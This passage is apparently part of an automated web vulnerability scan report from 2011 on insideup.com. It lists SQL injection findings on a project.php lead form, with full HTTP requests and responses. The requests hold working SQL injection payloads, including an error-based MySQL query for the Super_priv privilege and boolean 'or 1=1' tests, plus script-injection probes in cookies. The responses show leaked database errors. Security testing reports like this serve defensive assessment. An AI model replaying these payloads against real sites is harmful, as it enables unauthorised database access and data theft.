   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow/inco0010666913'%20or%201%3d2--%20/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:53:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco0010666913' or 1=2-- /project.php was not found on this server.</p>

1.434. http://www.insideup.com/ppc/leadflow/inco00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00'/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7438
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/inco00''/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7323
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.435. http://www.insideup.com/ppc/leadflow/inco00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13115930'%20or%201%3d1--%20 and 13115930'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/inco00/project.php13115930'%20or%201%3d1--%20?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow/inco00/project.php13115930'%20or%201%3d2--%20?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:55:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/project.php13115930' or 1=2-- was not found on this server.</p>

1.436. http://www.insideup.com/ppc/leadflow/inco00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/project.php'?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7438
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/inco00/project.php''?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; 